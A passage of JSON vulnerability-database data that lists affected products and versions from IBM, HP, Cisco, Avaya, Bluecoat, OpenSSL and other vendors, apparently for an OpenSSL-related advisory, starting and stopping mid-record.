"trust": 0.3, "vendor": "cisco", "version": "5.4.0.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cms r17 r4", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073800" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.60" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "powerlinux 7r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "norman shark network protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "proxysg sgos", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "6.5.6.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "infosphere master data management patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "power systems 350.b0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system idataplex dx360 m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63910" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "wag310g residential gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "power ese", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "aura utility services sp7", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571460" }, { "model": "sametime community server hf1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571431.43" }, { "model": "as infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "820.02" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.00" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.11" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.7" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "linux enterprise server for vmware sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1(0.625)" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "agent desktop", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88079030" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "sametime community server limited use", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087370" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571470" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12.1" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056340" }, { "model": "ctpos 7.0r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "system management homepage a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11.197" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "power system s824l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365041990" }, { "model": "system m4 hd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054600" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "flex system interconnect fabric", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.80" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.30" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.0" }, { "model": "infosphere master data management provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "560" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10g vfsm for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "norman shark industrial control system protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "power 795", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.3" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "systems insight manager update", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.31" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.51" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571430" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73210" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.21" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "cms r17 r3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22279160" }, { "model": "1:10g switch for bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.4.10.0" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power system s822l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571450" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504667" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.10" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205587" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1.1" }, { "model": "project openssl 0.9.8zd", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63800" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "ringmaster appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.60" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.19" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.5" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "ctpview 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.41" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bladecenter js22", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-61x)0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.5" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.20" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.32" }, { "model": "1:10g switch for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "system m4 bd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054660" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.15" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "src series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079460" }, { "model": "iptv", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.2" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "web security appliance 9.0.0 -fcs", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "systems insight manager sp3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079440" }, { "model": "bladecenter js23", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x)0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage 7.3.2.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571920" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079470" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056330" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571490" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "1:10g switch for bladecenter", "scope": 